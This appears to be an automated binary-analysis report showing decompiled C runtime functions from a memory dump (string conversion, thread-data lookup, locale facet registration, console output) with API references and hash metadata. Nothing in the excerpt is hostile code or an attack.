Opcode Fuzzy Hash: 9abf3f59dec7738373ee7c7b24e3141faa590b483cd3c49e1cbf56ea28e31277
Instruction Fuzzy Hash: D231EBB2C01258AFCF11AF99D881ADEBFF9FF08315F9841AAF908B2211D6354955CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00B59924, Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B59924(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E00B5A975(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(_t16 != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E00B5A975(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(_t17 != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E00B55B87(GetLastError());
									_t19 =  *((intOrPtr*)(E00B55BBD()));
								}
								L14:
								return _t19;
							}
							_t19 = E00B59EF0(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E00B55B87(GetLastError());
						return  *((intOrPtr*)(E00B55BBD()));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E00B59EF0(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E00B55F9A(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

0x00b5992b
0x00b59930
0x00b5994e
0x00b59950
0x00b59953
0x00b59980
0x00b59988
0x00b5998a
0x00b599a3
0x00b599a6
0x00b599a9
0x00b599b7
0x00b599c6
0x00b599ce
0x00b599d0
0x00b599e9
0x00b599ec
0x00b599ec
0x00b599d2
0x00b599d9
0x00b599e4
0x00b599e4
0x00b599ee
0x00000000
0x00b599ee
0x00b599ae
0x00b599b3
0x00b599b5
0x00000000
0x00000000
0x00000000
0x00b599b5
0x00b59993
0x00000000
0x00b5999e
0x00b59955
0x00b59958
0x00b5995b
0x00b5996e
0x00b59971
0x00b59944
0x00b59944
0x00000000
0x00b59947
0x00b59961
0x00b59966
0x00b59968
0x00b599f2
0x00b599f2
0x00000000
0x00b59968
0x00b59932
0x00b59937
0x00b5993c
0x00b5993e
0x00b59941
0x00000000

APIs

Part of subcall function 00B55F9A: _free.LIBCMT ref: 00B55FA8

Part of subcall function 00B5A975: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00B592F5,?,00000000,00000000), ref: 00B5AA17

GetLastError.KERNEL32 ref: 00B5998C
__dosmaperr.LIBCMT ref: 00B59993
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00B599D2
__dosmaperr.LIBCMT ref: 00B599D9

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 6503bc535637dc72e53064d936e970df4a2bae668eedb984428f680375a719cd
Instruction ID: 77722598bce5edc114ee1278fa956b2e6e290f8ca5e4322754606e974d58f8e0
Opcode Fuzzy Hash: 6503bc535637dc72e53064d936e970df4a2bae668eedb984428f680375a719cd
Instruction Fuzzy Hash: 3021B271604619EF9B20AFA18C81A6AB7EDEF0536671041DDFD6893140EB35EC488BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B5830D, Relevance: 6.1, APIs: 4, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00B5830D(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0xb69310; // 0x7
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E00B5DBB7(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E00B598AF(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E00B5DBB7(__eflags,  *0xb69310, _t51);
							if(__eflags != 0) {
								E00B58137(_t60, _t51, 0xb6a8cc);
								E00B564B8(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E00B5DBB7(__eflags,  *0xb69310, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E00B5DBB7(0,  *0xb69310, 0);
							_push(0);
							L9:
							E00B564B8();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E00B5DB78(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0xb69310; // 0x7
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E00B55E69(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0xb69310; // 0x7
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E00B5DBB7(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E00B598AF(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E00B5DBB7(__eflags,  *0xb69310, _t60);
								if(__eflags != 0) {
									E00B58137(_t60, _t60, 0xb6a8cc);
									E00B564B8(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E00B5DBB7(__eflags,  *0xb69310, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E00B5DBB7(__eflags,  *0xb69310, _t20);
								_push(_t60);
								L25:
								E00B564B8();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E00B5DB78(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0xb69310; // 0x7
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E00B55E69(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0xb69310; // 0x7
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E00B5DBB7(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E00B598AF(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E00B5DBB7(__eflags,  *0xb69310, _t54);
											if(__eflags != 0) {
												E00B58137(_t61, _t54, 0xb6a8cc);
												E00B564B8(0);
												goto L45;
											} else {
												_t40 = 0;
												E00B5DBB7(__eflags,  *0xb69310, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E00B5DBB7(0,  *0xb69310, 0);
											_push(0);
											L41:
											E00B564B8();
											goto L36;
										}
									}
								} else {
									_t54 = E00B5DB78(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0xb69310; // 0x7
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x00b5830d
0x00b5830d
0x00b58318
0x00b5831a
0x00b5831f
0x00b58322
0x00b58340
0x00b58343
0x00b58348
0x00b5834a
0x00000000
0x00b5834c
0x00b58358
0x00b5835b
0x00b5835c
0x00b5835e
0x00b58383
0x00b58385
0x00b5839e
0x00b583a5
0x00b583aa
0x00000000
0x00b58387
0x00b58387
0x00b58390
0x00b58395
0x00000000
0x00b58395
0x00b58360
0x00b58360
0x00b58360
0x00b58369
0x00b5836e
0x00b5836f
0x00b5836f
0x00b58374
0x00000000
0x00b58374
0x00b5835e
0x00b58324
0x00b5832a
0x00b5832e
0x00b5833b
0x00000000
0x00b58330
0x00b58333
0x00b583ad
0x00b583ad
0x00b58335
0x00b58335
0x00b58335
0x00b58337
0x00b58337
0x00b58337
0x00b58333
0x00b5832e
0x00b583b0
0x00b583b8
0x00b583ba
0x00b583bc
0x00b583c4
0x00b583c9
0x00b583ca
0x00b583cf
0x00b583d0
0x00b583d3
0x00b583ed
0x00b583f0
0x00b583f5
0x00b583f7
0x00000000
0x00b583f9
0x00b58405
0x00b58408
0x00b58409
0x00b5840b
0x00b5842e
0x00b58430
0x00b58447
0x00b5844e
0x00b58453
0x00000000
0x00b58432
0x00b58439
0x00b5843e
0x00000000
0x00b5843e
0x00b5840d
0x00b58414
0x00b58419
0x00b5841a
0x00b5841a
0x00b5841f
0x00000000
0x00b5841f
0x00b5840b
0x00b583d5
0x00b583db
0x00b583dd
0x00b583df
0x00b583e8
0x00000000
0x00b583e1
0x00b583e1
0x00b583e4
0x00b5845e
0x00b5845e
0x00b58463
0x00b58466
0x00b58467
0x00b58468
0x00b5846f
0x00b58471
0x00b58476
0x00b58479
0x00b58497
0x00b5849a
0x00b5849f
0x00b584a1
0x00000000
0x00b584a3
0x00b584af
0x00b584b3
0x00b584b5
0x00b584da
0x00b584dc
0x00b584f5
0x00b584fc
0x00000000
0x00b584de
0x00b584de
0x00b584e7
0x00b584ec
0x00000000
0x00b584ec
0x00b584b7
0x00b584b7
0x00b584b7
0x00b584c0
0x00b584c5
0x00b584c6
0x00b584c6
0x00000000
0x00b584cb
0x00b584b5
0x00b5847b
0x00b58481
0x00b58483
0x00b58485
0x00b58492
0x00000000
0x00b58487
0x00b58487
0x00b5848a
0x00b58504
0x00b58504
0x00b5848c
0x00b5848c
0x00b5848c
0x00b5848c
0x00b5848e
0x00b5848e
0x00b5848e
0x00b5848a
0x00b58485
0x00b58507
0x00b5850f
0x00b58511
0x00b58511
0x00b58518
0x00b583e6
0x00b58456
0x00b58456
0x00b58458
0x00000000
0x00b5845a
0x00b5845d
0x00b5845d
0x00b58458
0x00b583e4
0x00b583df
0x00b583be
0x00b583c3
0x00b583c3

APIs

GetLastError.KERNEL32(00000000,00000001,00000004,00B51A0E,00000001,00000000,00000002,?,00B58F84,00000002,00000000,00000001,00000002), ref: 00B58312
_free.LIBCMT ref: 00B5836F
_free.LIBCMT ref: 00B583A5
SetLastError.KERNEL32(00000000,00000007,000000FF,?,00B58F84,00000002,00000000,00000001,00000002), ref: 00B583B0

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: f5624b8f7b08e43e273d1cab06eb51bbe24a08d0d9572297326e1311dc835404
Instruction ID: 30ec472c3039161c2d1a552b2a7a444a1e76dfdf5bd13839a6da82a69f9d7939
Opcode Fuzzy Hash: f5624b8f7b08e43e273d1cab06eb51bbe24a08d0d9572297326e1311dc835404
Instruction Fuzzy Hash: AB1186322046016BDA1137759C85F3A36EADBC1BB7B2507E4FE24A72F1DEB58C1D8124

Uniqueness

Uniqueness Score: -1.00%

Function 00B58464, Relevance: 6.1, APIs: 4, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00B58464() {
				void* __esi;
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t17;
				long _t20;

				_t20 = GetLastError();
				_t2 =  *0xb69310; // 0x7
				_t23 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E00B5DBB7(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t17 = E00B598AF(1, 0x364);
						__eflags = _t17;
						if(__eflags != 0) {
							__eflags = E00B5DBB7(__eflags,  *0xb69310, _t17);
							if(__eflags != 0) {
								E00B58137(_t20, _t17, 0xb6a8cc);
								E00B564B8(0);
								goto L13;
							} else {
								_t13 = 0;
								E00B5DBB7(__eflags,  *0xb69310, 0);
								_push(_t17);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E00B5DBB7(0,  *0xb69310, 0);
							_push(0);
							L9:
							E00B564B8();
							goto L4;
						}
					}
				} else {
					_t17 = E00B5DB78(_t23, _t2);
					if(_t17 == 0) {
						_t2 =  *0xb69310; // 0x7
						goto L6;
					} else {
						if(_t17 != 0xffffffff) {
							L13:
							_t13 = _t17;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t17 = _t13;
						}
					}
				}
				SetLastError(_t20);
				asm("sbb edi, edi");
				return  ~_t17 & _t13;
			}

0x00b5846f
0x00b58471
0x00b58476
0x00b58479
0x00b58497
0x00b5849a
0x00b5849f
0x00b584a1
0x00000000
0x00b584a3
0x00b584af
0x00b584b3
0x00b584b5
0x00b584da
0x00b584dc
0x00b584f5
0x00b584fc
0x00000000
0x00b584de
0x00b584de
0x00b584e7
0x00b584ec
0x00000000
0x00b584ec
0x00b584b7
0x00b584b7
0x00b584b7
0x00b584c0
0x00b584c5
0x00b584c6
0x00b584c6
0x00000000
0x00b584cb
0x00b584b5
0x00b5847b
0x00b58481
0x00b58485
0x00b58492
0x00000000
0x00b58487
0x00b5848a
0x00b58504
0x00b58504
0x00b5848c
0x00b5848c
0x00b5848c
0x00b5848e
0x00b5848e
0x00b5848e
0x00b5848a
0x00b58485
0x00b58507
0x00b5850f
0x00b58518

APIs

GetLastError.KERNEL32(?,00000000,00000002,00B55BC2,00B56F5F,00000000,?,00B5084B,00000002,?,?,?,00B424A9,00000000,0000002C,00B425BB), ref: 00B58469
_free.LIBCMT ref: 00B584C6
_free.LIBCMT ref: 00B584FC
SetLastError.KERNEL32(00000000,00000007,000000FF,?,00000000,00000002,00B55BC2,00B56F5F,00000000,?,00B5084B,00000002,?,?,?,00B424A9), ref: 00B58507

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: fd8cd9c48bf2f0ed4fb39190965b0adefa2e488cc97e83967bd0eb25b10ea830
Instruction ID: 7e3eb8fbb970a5e19310b757852dca9e988906cb3e4efbb693c8cf0f3df71433
Opcode Fuzzy Hash: fd8cd9c48bf2f0ed4fb39190965b0adefa2e488cc97e83967bd0eb25b10ea830
Instruction Fuzzy Hash: B011A5322046016BDB612775AC85F2A26DEEBC17B7B2507E4FE24B33E1DEB58C1D8520

Uniqueness

Uniqueness Score: -1.00%

Function 00B4766E, Relevance: 6.1, APIs: 4, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00B4766E(void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v12;
				char _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t72;
				char _t83;
				intOrPtr _t85;
				char _t86;
				intOrPtr _t88;
				void* _t93;
				intOrPtr _t95;
				intOrPtr _t100;
				void* _t103;
				intOrPtr _t104;
				void* _t107;
				char _t112;
				char _t113;
				intOrPtr* _t120;
				intOrPtr* _t121;
				intOrPtr _t122;
				intOrPtr _t124;
				signed int _t126;
				intOrPtr _t137;
				signed int _t139;
				signed int _t143;
				intOrPtr* _t145;

				E00B4B97D( &_v12, 0);
				_t139 =  *0xb6ae84; // 0x0
				_v8 = _t139;
				_t72 = E00B43598(0xb6a178);
				_t116 = _a4;
				_t143 = E00B43612(_a4, _t72);
				if(_t143 != 0) {
					L5:
					E00B4B9D5( &_v12);
					return _t143;
				} else {
					if(_t139 == 0) {
						__eflags = E00B4367F(__ebx, _t116, __edx,  &_v8, _a4) - 0xffffffff;
						if(__eflags == 0) {
							_t120 =  &_v24;
							E00B4345D(_t120);
							E00B4D24A( &_v24, 0xb66510);
							asm("int3");
							_push(0x2c);
							E00B64BBE();
							_v44 = __edx;
							_t145 = _t120;
							_v36 = _t145;
							__eflags = 0;
							_v28 = 0;
							_t121 = __edx;
							_t137 = __edx + 1;
							do {
								_t83 =  *_t121;
								_t121 = _t121 + 1;
								__eflags = _t83;
							} while (_t83 != 0);
							_t122 = _t121 - _t137;
							_v32 = _t122;
							_t85 =  *((intOrPtr*)( *_t145 + 4));
							_t112 =  *((intOrPtr*)(_t85 + _t145 + 0x20));
							_t86 =  *((intOrPtr*)(_t85 + _t145 + 0x24));
							__eflags = _t86;
							if(__eflags < 0) {
								L16:
								asm("xorps xmm0, xmm0");
								asm("movlpd [ebp-0x30], xmm0");
								_t86 = _v48;
								_t113 = _v52;
							} else {
								if(__eflags > 0) {
									L15:
									_t113 = _t112 - _t122;
									asm("sbb eax, edi");
								} else {
									__eflags = _t112;
									if(_t112 <= 0) {
										goto L16;
									} else {
										__eflags = _t86;
										if(__eflags < 0) {
											goto L16;
										} else {
											if(__eflags > 0) {
												goto L15;
											} else {
												__eflags = _t112 - _t122;
												if(_t112 <= _t122) {
													goto L16;
												} else {
													goto L15;
												}
											}
										}
									}
								}
							}
							_v24 = _t86;
							E00B47B12( &_v60, _t145);
							__eflags = _v56;
							if(_v56 != 0) {
								_v8 = 0;
								_t124 =  *_t145;
								_t88 =  *((intOrPtr*)(_t124 + 4));
								__eflags = ( *(_t88 + _t145 + 0x14) & 0x000001c0) - 0x40;
								if(( *(_t88 + _t145 + 0x14) & 0x000001c0) == 0x40) {
									L27:
									_t93 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t124 + 4)) + _t145 + 0x38)))) + 0x24))(_v44, _v32, 0);
									__eflags = _t93 - _v32;
									if(_t93 != _v32) {
										goto L34;
									} else {
										__eflags = _t137;
										if(_t137 != 0) {
											goto L34;
										} else {
											_t100 = _v24;
											while(1) {
												__eflags = _t100;
												if(__eflags < 0) {
													break;
												}
												if(__eflags > 0) {
													L33:
													_v44 =  *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4)) + _t145 + 0x40));
													_t103 = E00B47BAB( *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4)) + _t145 + 0x38)), _v44);
													__eflags = _t103 - 0xffffffff;
													if(_t103 != 0xffffffff) {
														_t113 = _t113 + 0xffffffff;
														_v52 = _t113;
														_t100 = _v24;
														asm("adc eax, 0xffffffff");
														_v24 = _t100;
														_v48 = _t100;
														continue;
													} else {
														goto L34;
													}
												} else {
													__eflags = _t113;
													if(_t113 <= 0) {
														break;
													} else {
														goto L33;
													}
												}
												goto L37;
											}
											_t126 = 0;
										}
									}
								} else {
									_t104 = _v24;
									while(1) {
										__eflags = _t104;
										if(__eflags < 0) {
											break;
										}
										if(__eflags > 0) {
											L24:
											_v40 =  *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4)) + _t145 + 0x40));
											_t107 = E00B47BAB( *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4)) + _t145 + 0x38)), _v40);
											__eflags = _t107 - 0xffffffff;
											if(_t107 == 0xffffffff) {
												L34:
												_t126 = 4;
												_v28 = _t126;
											} else {
												_t113 = _t113 + 0xffffffff;
												_v52 = _t113;
												_t104 = _v24;
												asm("adc eax, 0xffffffff");
												_v24 = _t104;
												_v48 = _t104;
												continue;
											}
										} else {
											__eflags = _t113;
											if(_t113 <= 0) {
												break;
											} else {
												goto L24;
											}
										}
										goto L37;
									}
									_t124 =  *_t145;
									goto L27;
								}
								L37:
								_t95 =  *((intOrPtr*)( *_t145 + 4));
								 *((intOrPtr*)(_t95 + _t145 + 0x20)) = 0;
								 *((intOrPtr*)(_t95 + _t145 + 0x24)) = 0;
								_v8 = _v8 | 0xffffffff;
							} else {
								_t126 = 4;
							}
							__eflags =  *((intOrPtr*)( *_t145 + 4)) + _t145;
							E00B4759B(_t126, 0);
							E00B47AE8( &_v60, __eflags);
							E00B64B2D();
							return _t145;
						} else {
							_t143 = _v8;
							E00B4BBA2(__eflags, _t143);
							 *((intOrPtr*)( *_t143 + 4))();
							 *0xb6ae84 = _t143;
							goto L5;
						}
					} else {
						_t143 = _t139;
						goto L5;
					}
				}
			}

0x00b4767b
0x00b47680
0x00b4768b
0x00b4768e
0x00b47693
0x00b4769c
0x00b476a0
0x00b476d4
0x00b476d7
0x00b476e1
0x00b476a2
0x00b476a4
0x00b476b8
0x00b476bb
0x00b476e2
0x00b476e5
0x00b476f3
0x00b476f8
0x00b476f9
0x00b47700
0x00b47705
0x00b47708
0x00b4770a
0x00b4770d
0x00b47711
0x00b47714
0x00b47716
0x00b47719
0x00b47719
0x00b4771b
0x00b4771c
0x00b4771c
0x00b47720
0x00b47722
0x00b47727
0x00b4772a
0x00b4772e
0x00b47732
0x00b47734
0x00b4774c
0x00b4774c
0x00b4774f
0x00b47754
0x00b47757
0x00b47736
0x00b47736
0x00b47746
0x00b47746
0x00b47748
0x00b47738
0x00b47738
0x00b4773a
0x00000000
0x00b4773c
0x00b4773c
0x00b4773e
0x00000000
0x00b47740
0x00b47740
0x00000000
0x00b47742
0x00b47742
0x00b47744
0x00000000
0x00000000
0x00000000
0x00000000
0x00b47744
0x00b47740
0x00b4773e
0x00b4773a
0x00b47736
0x00b4775a
0x00b47761
0x00b47766
0x00b4776a
0x00b47774
0x00b47777
0x00b47779
0x00b47785
0x00b47788
0x00b477ca
0x00b477da
0x00b477dd
0x00b477e0
0x00000000
0x00b477e2
0x00b477e2
0x00b477e4
0x00000000
0x00b477e6
0x00b477e6
0x00b477e9
0x00b477e9
0x00b477eb
0x00000000
0x00000000
0x00b477ed
0x00b477f3
0x00b477fc
0x00b47806
0x00b4780b
0x00b4780e
0x00b47818
0x00b4781b
0x00b4781e
0x00b47821
0x00b47824
0x00b47827
0x00000000
0x00000000
0x00000000
0x00000000
0x00b477ef
0x00b477ef
0x00b477f1
0x00000000
0x00000000
0x00000000
0x00000000
0x00b477f1
0x00000000
0x00b477ed
0x00b4782c
0x00b4782c
0x00b477e4
0x00b4778a
0x00b4778a
0x00b4778d
0x00b4778d
0x00b4778f
0x00000000
0x00000000
0x00b47791
0x00b47797
0x00b477a0
0x00b477aa
0x00b477af
0x00b477b2
0x00b47810
0x00b47812
0x00b47813
0x00b477b4
0x00b477b4
0x00b477b7
0x00b477ba
0x00b477bd
0x00b477c0
0x00b477c3
0x00000000
0x00b477c3
0x00b47793
0x00b47793
0x00b47795
0x00000000
0x00000000
0x00000000
0x00000000
0x00b47795
0x00000000
0x00b47791
0x00b477c8
0x00000000
0x00b477c8
0x00b4782e
0x00b47830
0x00b47833
0x00b47837
0x00b4783b
0x00b4776c
0x00b4776e
0x00b4776e
0x00b4786d
0x00b4786f
0x00b47877
0x00b4787e
0x00b47883
0x00b476bd
0x00b476bd
0x00b476c1
0x00b476cb
0x00b476ce
0x00000000
0x00b476ce
0x00b476a6
0x00b476a6
0x00000000
0x00b476a6
0x00b476a4

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00B4767B

Part of subcall function 00B43598: std::_Lockit::_Lockit.LIBCPMT ref: 00B435A9
Part of subcall function 00B43598: std::_Lockit::~_Lockit.LIBCPMT ref: 00B435C3

std::_Facet_Register.LIBCPMT ref: 00B476C1
std::_Lockit::~_Lockit.LIBCPMT ref: 00B476D7
__CxxThrowException@8.LIBVCRUNTIME ref: 00B476F3

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID:
API String ID: 2536120697-0
Opcode ID: 199d7487d49e4b997ebe454396f805a36d9ab40525540bbf9022274d2e02d247
Instruction ID: bcca919c73e127334021b4bfb8e1bc92c817c388440e883a2e168ab0706eeb0c
Opcode Fuzzy Hash: 199d7487d49e4b997ebe454396f805a36d9ab40525540bbf9022274d2e02d247
Instruction Fuzzy Hash: B701D232900514ABCB00EB68C915C9DB7F8EF81750B2500D5FA01B7291EF34DF01EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B64782, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B64782(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0xb699a0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E00B6476B();
					E00B6472D();
					_t13 = WriteConsoleW( *0xb699a0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x00b6479f
0x00b647a3
0x00b647b0
0x00b647b5
0x00b647d0
0x00b647d0
0x00b647d6

APIs

WriteConsoleW.KERNEL32(00B513E1,?,?,00000000,00B513E1,?,00B6424E,00B513E1,00000001,00B513E1,00B513E1,?,00B6268D,00000000,8304488B,00B513E1), ref: 00B64799
GetLastError.KERNEL32(?,00B6424E,00B513E1,00000001,00B513E1,00B513E1,?,00B6268D,00000000,8304488B,00B513E1,00000000,00B513E1,?,00B62BE1,00000010), ref: 00B647A5

Part of subcall function 00B6476B: CloseHandle.KERNEL32(FFFFFFFE,00B647B5,?,00B6424E,00B513E1,00000001,00B513E1,00B513E1,?,00B6268D,00000000,8304488B,00B513E1,00000000,00B513E1), ref: 00B6477B

___initconout.LIBCMT ref: 00B647B5

Part of subcall function 00B6472D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B6475C,00B6423B,00B513E1,?,00B6268D,00000000,8304488B,00B513E1,00000000), ref: 00B64740

WriteConsoleW.KERNEL32(00B513E1,?,?,00000000,?,00B6424E,00B513E1,00000001,00B513E1,00B513E1,?,00B6268D,00000000,8304488B,00B513E1,00000000), ref: 00B647CA

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 99e221b944c41b370d0e8b7ffbf5d1de2e46d09af5fccb61c4ffae346712f2d2
Instruction ID: c7f1569d05cdd591483dcc61c28b5bbfc6b670c492bb80068e74370509b2c834
Opcode Fuzzy Hash: 99e221b944c41b370d0e8b7ffbf5d1de2e46d09af5fccb61c4ffae346712f2d2
Instruction Fuzzy Hash: A6F01C36442515BBCF221F91DC0899A3F6AFB0B7A1B004055FA08A6160CF769C20DB91

Uniqueness

